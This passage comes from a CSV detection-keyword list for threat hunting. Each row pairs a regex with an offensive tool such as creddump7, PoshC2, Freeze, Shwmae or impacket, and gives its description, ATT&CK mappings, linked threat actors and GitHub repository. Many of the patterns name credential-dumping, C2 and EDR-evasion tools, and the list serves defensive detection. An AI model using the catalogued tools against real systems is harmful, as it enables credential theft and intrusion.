TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","45239" "*Forwards WebAuthn assertion requests to a compromised host running the Shwmae Windows Hello abuse tool*",".{0,1000}Forwards\sWebAuthn\sassertion\srequests\sto\sa\scompromised\shost\srunning\sthe\sShwmae\sWindows\sHello\sabuse\stool.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","45240" "*Found a sideloaded DLL, assuming injection already performed*",".{0,1000}Found\sa\ssideloaded\sDLL,\sassuming\sinjection\salready\sperformed.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","45241" "*found-passwords.txt*",".{0,1000}found\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","45242" "*FourEye(shellcode_bypass*",".{0,1000}FourEye\(shellcode_bypass.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","45243" "*FourEye-main*",".{0,1000}FourEye\-main.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","45244" "*foxglovesec/Potato*",".{0,1000}foxglovesec\/Potato.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068 - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","1","N/A","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","45245" "*fox-it/adconnectdump*",".{0,1000}fox\-it\/adconnectdump.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","45246" "*fox-it/BloodHound*",".{0,1000}fox\-it\/BloodHound.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","45247" "*foxlox/hypobrychium*",".{0,1000}foxlox\/hypobrychium.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z","45248" "*fpc -c Seatbelt*",".{0,1000}fpc\s\-c\sSeatbelt.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral 
Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45249" "*FrameManagementAssociationRequest.py*",".{0,1000}FrameManagementAssociationRequest\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45250" "*FrameManagementDeauthentication.py*",".{0,1000}FrameManagementDeauthentication\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45251" "*FrameManagementProbeRequest.py*",".{0,1000}FrameManagementProbeRequest\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45252" "*FrameManagementReassociationResponse.py*",".{0,1000}FrameManagementReassociationResponse\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45253" "*framework.win32.domcachedump*",".{0,1000}framework\.win32\.domcachedump.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","45254" "*framework.win32.domcachedumplive*",".{0,1000}framework\.win32\.domcachedumplive.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","45255" "*framework.win32.lsasecrets*",".{0,1000}framework\.win32\.lsasecrets.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential 
Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","45256" "*framework.win32.lsasecretslive*",".{0,1000}framework\.win32\.lsasecretslive.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","45257" "*framework/obfuscation/*",".{0,1000}framework\/obfuscation\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45258" "*Framework-MobSF*",".{0,1000}Framework\-MobSF.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF supports mobile app binaries (APK. XAPK. IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline. The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Framework","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","N/A","10","18450","3353","2025-03-29T17:57:28Z","2015-01-31T04:36:01Z","45259" "*frampton.py*",".{0,1000}frampton\.py.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery.
shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","45260" "*Freakboy/Godzilla*",".{0,1000}Freakboy\/Godzilla.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","45261" "*freenas_reverse_root_shell_csrf*",".{0,1000}freenas_reverse_root_shell_csrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","45262" "*Freeze_*_darwin_amd64*",".{0,1000}Freeze_.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","#linux","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","45263" "*Freeze_*_linux_amd64*",".{0,1000}Freeze_.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","#linux","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","45264" "*Freeze-rs -*",".{0,1000}Freeze\-rs\s\-.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","0","N/A","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","45265" "*Freeze-rs.exe*",".{0,1000}Freeze\-rs\.exe.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. 
direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","45266" "*Freeze-rs_darwin_amd64*",".{0,1000}Freeze\-rs_darwin_amd64.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","#linux","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","45267" "*Freeze-rs_linux_amd64*",".{0,1000}Freeze\-rs_linux_amd64.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","#linux","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","45268" "*Freeze-rs_windows_amd64.exe*",".{0,1000}Freeze\-rs_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. 
direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","45269" "*frida -l disableRoot.js -f owasp.mstg.uncrackable1*",".{0,1000}frida\s\-l\sdisableRoot\.js\s\-f\sowasp\.mstg\.uncrackable1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45270" "*frida-ps -U*",".{0,1000}frida\-ps\s\-U.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45271" "*frida-trace -x ntdll.dll -i * -p *",".{0,1000}frida\-trace\s\-x\sntdll\.dll\s\-i\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","45272" "*Friends-Security/ShadowHound*",".{0,1000}Friends\-Security\/ShadowHound.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - 
TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","1","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","45273" "*Frissi0n/GTFONow*",".{0,1000}Frissi0n\/GTFONow.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","45274" "*frkngksl/NimExec*",".{0,1000}frkngksl\/NimExec.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","45275" "*frkngksl/Shoggoth*",".{0,1000}frkngksl\/Shoggoth.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","45276" "*frkngksl/UnlinkDLL*",".{0,1000}frkngksl\/UnlinkDLL.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","45277" "*from . 
import knowsmore*",".{0,1000}from\s\.\simport\sknowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","45278" "*from .auth import Pac2User*",".{0,1000}from\s\.auth\simport\sPac2User.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#content","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","45279" "*from .ccache import Ccache*",".{0,1000}from\s\.ccache\simport\sCcache.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45280" "*from .core import Fuzzer*",".{0,1000}from\s\.core\simport\sFuzzer.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","45281" "*from .dropbox import DropboxBeacon*",".{0,1000}from\s\.dropbox\simport\sDropboxBeacon.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#content","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","45282" "*from .enumeration import ecrprivenum*",".{0,1000}from\s\.enumeration\simport\secrprivenum.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - 
TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45283" "*from .enumeration import ecrpubenum*",".{0,1000}from\s\.enumeration\simport\secrpubenum.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45284" "*from .enumeration import loadbalancer as loadbalancer*",".{0,1000}from\s\.enumeration\simport\sloadbalancer\sas\sloadbalancer.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45285" "*from .enumeration import rand_id_generator as rand_id_generator*",".{0,1000}from\s\.enumeration\simport\srand_id_generator\sas\srand_id_generator.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45286" "*from .enumeration import s3aclenum as s3aclenum*",".{0,1000}from\s\.enumeration\simport\ss3aclenum\sas\ss3aclenum.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45287" "*from .enumeration import 
snsenum*",".{0,1000}from\s\.enumeration\simport\ssnsenum.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","45288" "*from .modules.exploit import Exploit*",".{0,1000}from\s\.modules\.exploit\simport\sExploit.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","45289" "*from .secretsdump import RemoteOperations*",".{0,1000}from\s\.secretsdump\simport\sRemoteOperations.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","45290" "*from .SirepCommand import SirepCommand*",".{0,1000}from\s\.SirepCommand\simport\sSirepCommand.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","45291" "*from .SirepResult import SirepResult*",".{0,1000}from\s\.SirepResult\simport\sSirepResult.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - 
T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","45292" "*from .socks import SocksNegotiator*",".{0,1000}from\s\.socks\simport\sSocksNegotiator.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","45293" "*from .wfuzz import *",".{0,1000}from\s\.wfuzz\simport\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","45294" "*from BlankOBFv2 import 